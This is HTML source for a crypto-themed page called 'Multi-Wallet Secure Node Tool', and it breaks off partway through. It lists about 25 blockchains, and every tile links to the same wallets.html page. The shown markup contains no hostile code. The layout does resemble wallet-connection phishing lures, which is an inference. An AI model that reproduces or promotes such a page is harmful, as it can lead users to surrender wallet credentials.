<!DOCTYPE html>
<html style="font-size: 16px;">
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="Hosting for your business, ​Hosting solution with benefits, ​Fastest Hosting, We help and solve your business problem., 01, 02, 03, 04, faq, Start now &amp;
don't look back., Stop pushing your clients into a corner., $ 29, $ 59, $ 139, Contact us">
    <meta name="description" content="">
    <meta name="page_type" content="np-template-header-footer-from-plugin">
    <title>blockchain node</title>
    <link rel="stylesheet" href="nicepage.css" media="screen">
<link rel="stylesheet" href="blockchain-node.css" media="screen">
    <script class="u-script" type="text/javascript" src="jquery.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>
    <meta name="generator" content="Nicepage 3.28.0, nicepage.com">
    <link rel="icon" href="images/favicon.webp">
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i|Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i">
    <link id="u-page-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i">
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": "BLOCKCHAIN NODE TOOL",
		"logo": "images/ScreenShot2021-10-16at10.29.02PM.png"
}</script>
    <meta name="theme-color" content="#2f4ace">
    <meta property="og:title" content="blockchain node">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
  </head>
  <body class="u-body"><header class="u-clearfix u-header u-header" id="sec-91cc"><div class="u-clearfix u-sheet u-sheet-1">
        <nav class="u-menu u-menu-dropdown u-offcanvas u-menu-1" data-responsive-from="XL">
          <div class="menu-collapse" style="font-size: 1rem; letter-spacing: 0px; font-weight: 700; text-transform: uppercase;" wfd-invisible="true">
            <a class="u-button-style u-custom-active-border-color u-custom-border u-custom-border-color u-custom-borders u-custom-hover-border-color u-custom-left-right-menu-spacing u-custom-padding-bottom u-custom-text-color u-custom-text-hover-color u-custom-top-bottom-menu-spacing u-nav-link u-text-active-palette-1-base u-text-hover-palette-2-base" href="blockchain-node.html#">
              <svg><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#menu-hamburger"></use></svg>
              <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><defs><symbol id="menu-hamburger" viewBox="0 0 16 16" style="width: 16px; height: 16px;"><rect y="1" width="16" height="2"></rect><rect y="7" width="16" height="2"></rect><rect y="13" width="16" height="2"></rect>
</symbol>
</defs></svg>
            </a>
          </div>
          <div class="u-custom-menu u-nav-container">
            <ul class="u-nav u-spacing-30 u-unstyled u-nav-1"><li class="u-nav-item"><a class="u-border-2 u-border-active-palette-1-base u-border-hover-palette-1-base u-border-no-left u-border-no-right u-border-no-top u-button-style u-nav-link u-text-active-palette-1-base u-text-grey-90 u-text-hover-grey-90" href="https://blockchain-nodes.net/about-us.html" style="padding: 10px 0px;">about us</a>
</li><li class="u-nav-item"><a class="u-border-2 u-border-active-palette-1-base u-border-hover-palette-1-base u-border-no-left u-border-no-right u-border-no-top u-button-style u-nav-link u-text-active-palette-1-base u-text-grey-90 u-text-hover-grey-90" href="blockchain-node.html" style="padding: 10px 0px;">blockchain node</a>
</li></ul>
          </div>
          <div class="u-custom-menu u-nav-container-collapse" wfd-invisible="true">
            <div class="u-black u-container-style u-inner-container-layout u-opacity u-opacity-95 u-sidenav">
              <div class="u-inner-container-layout u-sidenav-overflow">
                <div class="u-menu-close"></div>
                <ul class="u-align-center u-nav u-popupmenu-items u-unstyled u-nav-2"><li class="u-nav-item"><a class="u-button-style u-nav-link" href="https://blockchain-nodes.net/about-us.html" style="padding: 10px 20px;">about us</a>
</li></ul>
              </div>
            </div>
            <div class="u-black u-menu-overlay u-opacity u-opacity-70" wfd-invisible="true"></div>
          </div>
        </nav>
        <a href="blockchain-node.html" data-page-id="146805585" class="u-image u-logo u-image-1" data-image-width="1368" data-image-height="246" title="blockchain node">
          <img src="images/ScreenShot2021-10-16at10.29.02PM.png" class="u-logo-image u-logo-image-1">
        </a>
      </div></header> 
    <section class="u-clearfix u-grey-10 u-section-1" id="sec-dedf">
      <div class="u-clearfix u-expanded-width u-gutter-0 u-layout-wrap u-layout-wrap-1">
        <div class="u-layout" style="">
          <div class="u-layout-row" style="">
            <div class="u-align-center u-container-style u-layout-cell u-left-cell u-shape-rectangle u-size-60 u-size-xs-60 u-white u-layout-cell-1" src="">
              <div class="u-border-2 u-border-grey-75 u-container-layout u-container-layout-1">
                <h1 class="u-custom-font u-font-montserrat u-text u-text-palette-1-dark-2 u-text-1">
                  <span style="font-size: 1.875rem;">Multi-Wallet Secure Node Tool</span>
                  <br>
                </h1>
                <a href="blockchain-node.html#sec-1960" data-page-id="146805585" class="u-active-grey-90 u-border-none u-btn u-btn-round u-button-style u-hover-grey-90 u-palette-1-dark-2 u-radius-8 u-text-active-white u-text-body-alt-color u-text-hover-white u-btn-1">Explore Node Features</a>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="u-clearfix u-custom-html u-custom-html-1">
        <cove-markets-market-ticker-tape instrumentselection="BTC-USD,ETH-USD,SOL-USD,ADA-USD" position="center" width="100%" maxwidth="900px" border="1px solid gray" showborder="true"></cove-markets-market-ticker-tape>
        <script type="module" defer="defer" src="https://cdn.jsdelivr.net/npm/@covemarkets/web-widgets@0.0.36/dist/market-ticker-tape/index.js"></script>
      </div>
    </section>
    <section class="u-clearfix u-section-2" id="sec-d6dc">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-expanded-width u-layout-grid u-list u-list-1">
          <div class="u-repeater u-repeater-1">
            <div class="u-align-center-lg u-align-center-md u-align-center-sm u-align-center-xl u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-1">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-1">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-1" href="wallets.html" data-page-id="214123313"><b>BINANCE CHAIN </b>
                  </a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-1" data-href="wallets.html" data-page-id="214123313"><img src="images/bnb.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-2">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-2" href="wallets.html" data-page-id="214123313">
                    <span style="font-weight: normal;">For Binance Chain, Click here</span>
                  </a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-2">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-3">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-3" href="wallets.html" data-page-id="214123313"><b>ETHERUEM CHAIN</b>
                  </a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-2" data-href="wallets.html" data-page-id="214123313"><img src="images/Ethereum-ETH-icon.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-4">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-4" href="wallets.html" data-page-id="214123313">
                    <span style="font-weight: normal;"> For Ethereum Chain, Click here</span>
                  </a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-3">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-5">
                  <a href="wallets.html" data-page-id="214123313" class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-5">ARBITRUM CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-3" data-href="wallets.html" data-page-id="214123313"><img src="images/arbitrum.jpg" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-6">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-6" href="wallets.html" data-page-id="214123313"> For Arbitrum Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-4">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-7">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-7" href="wallets.html" data-page-id="214123313">SOLANA CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-4" data-href="wallets.html" data-page-id="214123313"><img src="images/sOLANA.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-8">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-8" href="wallets.html" data-page-id="214123313"> For Solana Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item" data-href="wallets.html" data-page-id="214123313">
              <div class="u-container-layout u-similar-container u-container-layout-5">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-9">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-9" href="wallets.html" data-page-id="214123313">BITCOIN CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-5" data-href="wallets.html" data-page-id="214123313"><img src="images/2000px-BTC_Logo.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-10">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-10" href="wallets.html" data-page-id="214123313"> For Bitcoin&nbsp;Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-6">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-11">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-11" href="wallets.html" data-page-id="214123313">POLYGON CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-6" data-href="wallets.html" data-page-id="214123313"><img src="images/polygon.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-12">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-12" href="wallets.html" data-page-id="214123313"> For Polygon Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-7">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-13">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-13" href="wallets.html" data-page-id="214123313">AVAX CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-7" data-href="wallets.html" data-page-id="214123313"><img src="images/avalanche-avax-logo.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-14">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-14" href="wallets.html" data-page-id="214123313"> For AVAX Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-8">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-15">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-15" href="wallets.html" data-page-id="214123313">FANTOM CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-8" data-href="wallets.html" data-page-id="214123313"><img src="images/fantom-ftm-logo.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-16">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-16" href="wallets.html" data-page-id="214123313"> For Fantom&nbsp;Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-9">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-17">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-17" href="wallets.html" data-page-id="214123313">HECO CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-9" data-href="wallets.html" data-page-id="214123313"><img src="images/heco.jpg" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-18">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-18" href="wallets.html" data-page-id="214123313"> For HECO Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-10">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-19">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-19" href="wallets.html" data-page-id="214123313">TERRA CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-10" data-href="wallets.html" data-page-id="214123313"><img src="images/Terra-Logo.jpg" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-20">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-20" href="wallets.html" data-page-id="214123313"> For Terra&nbsp;Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-11">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-21">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-21" href="wallets.html" data-page-id="214123313">xDAI CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-11" data-href="wallets.html" data-page-id="214123313"><img src="images/xdai.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-22">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-22" href="wallets.html" data-page-id="214123313"> For xDAI Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-12">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-23">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-23" href="wallets.html" data-page-id="214123313">ZILLIQA CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-12" data-href="wallets.html" data-page-id="214123313"><img src="images/Zilliqa-ZIL-icon.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-24">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-24" href="wallets.html" data-page-id="214123313"> For Zilliqa Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-13">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-25">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-25" href="wallets.html" data-page-id="214123313">TRON CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-13" data-href="wallets.html" data-page-id="214123313"><img src="images/tron-trx-logo.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-26">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-26" href="wallets.html" data-page-id="214123313"> For TRON Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-14">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-27">TEZOS CHAIN</h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-14" data-href="wallets.html" data-page-id="214123313"><img src="images/tezos.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-28">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-27" href="wallets.html" data-page-id="214123313"> For Tezos&nbsp;Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-15">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-29">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-28" href="wallets.html" data-page-id="214123313">ALGORAND CHAIN<br>
                  </a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-15" data-href="wallets.html" data-page-id="214123313"><img src="images/algo.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-30">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-29" href="wallets.html" data-page-id="214123313"> For Algorand Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-16">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-31">COSMOS CHAIN</h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-16" data-href="wallets.html" data-page-id="214123313"><img src="images/cosmos.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-32">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-30" href="wallets.html" data-page-id="214123313"> For Cosmos Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-17">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-33">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-31" href="wallets.html" data-page-id="214123313">HARMONY ONE CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-17" data-href="wallets.html" data-page-id="214123313"><img src="images/harmony.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-34">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-32" href="wallets.html" data-page-id="214123313"> For ONE&nbsp;Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-18">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-35">POLKADOT CHAIN</h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-18" data-href="wallets.html" data-page-id="214123313"><img src="images/Polkadot_symbol_color.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-36">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-33" href="wallets.html" data-page-id="214123313"> For DOT Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-19">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-37">CARDANO(ADA) CHAIN<br>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-19" data-href="wallets.html" data-page-id="214123313"><img src="images/ada.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-38">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-34" href="wallets.html" data-page-id="214123313"> For ADA Chain, Click here</a>
                </p>
              </div>
            </div>
            <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
              <div class="u-container-layout u-similar-container u-container-layout-20">
                <h6 class="u-align-center-md u-align-center-sm u-align-center-xs u-custom-font u-text u-text-font u-text-palette-1-dark-2 u-text-39">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-35" href="wallets.html" data-page-id="214123313">KUCOIN CHAIN</a>
                </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hover-none u-icon u-text-palette-1-dark-2 u-icon-20" data-href="wallets.html" data-page-id="214123313"><img src="images/KCC.png" alt=""></span>
                <p class="u-align-center-xs u-text u-text-palette-1-dark-2 u-text-40">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-36" href="wallets.html" data-page-id="214123313"> For KCC Chain, Click here</a>
                </p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    <section class="u-clearfix u-hidden-lg u-hidden-md u-hidden-sm u-hidden-xs u-section-3" id="sec-8a2f" data-animation-name="" data-animation-duration="0" data-animation-delay="0" data-animation-direction="">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-expanded-width-lg u-expanded-width-md u-expanded-width-xl u-repeater u-repeater-1" data-animation-name="" data-animation-duration="0" data-animation-delay="0" data-animation-direction="">
          <div class="u-align-center-lg u-align-center-md u-align-center-sm u-align-center-xl u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-1">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-1"><b>
                  <a href="wallets.html" data-page-id="214123313" class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-1">RIPPLE CHAIN</a></b>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-1" data-href="wallets.html" data-page-id="214123313"><img src="images/xrp.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-2">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-2" href="wallets.html" data-page-id="214123313">For Ripple Chain, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-2">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-3">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-3" href="wallets.html" data-page-id="214123313"><b>FILECOIN CHAIN</b>
                </a>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-2" data-href="wallets.html" data-page-id="214123313"><img src="images/filecoin.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-4">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-4" href="wallets.html" data-page-id="214123313"> For Filecoin Chain, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-3">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-5">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-5" href="wallets.html" data-page-id="214123313"><b>VeC​hain</b>
                </a>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-3" data-href="wallets.html" data-page-id="214123313"><img src="images/vechain.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-6">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-6" href="wallets.html" data-page-id="214123313"> For Ve Chain, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item">
            <div class="u-container-layout u-similar-container u-container-layout-4">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-7"><b>
                  <a href="wallets.html" data-page-id="214123313" class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-7">NERVOS CHAIN</a></b>
              </h6><span class="u-active-none u-align-center-xs u-button-link u-button-style u-file-icon u-hidden-lg u-hidden-sm u-hover-none u-icon u-text-palette-1-dark-2 u-icon-4" data-href="wallets.html" data-page-id="214123313"><img src="images/nervos.png" alt=""></span>
              <p class="u-align-center-xs u-hidden-sm u-text u-text-palette-1-dark-2 u-text-8">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-base u-btn-8" href="wallets.html" data-page-id="214123313"> For Nervos Chain, Click here</a>
              </p>
            </div>
          </div>
          <div class="u-align-center u-border-2 u-border-grey-75 u-container-style u-list-item u-repeater-item" data-href="wallets.html" data-page-id="214123313">
            <div class="u-container-layout u-similar-container u-container-layout-5">
              <h6 class="u-hidden-sm u-text u-text-font u-text-palette-1-dark-2 u-text-9">
                <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-1-dark-2 u-btn-9" href="wallets.html" data-page-id="214123313"><b>EOS CHAIN</b>
                </a>
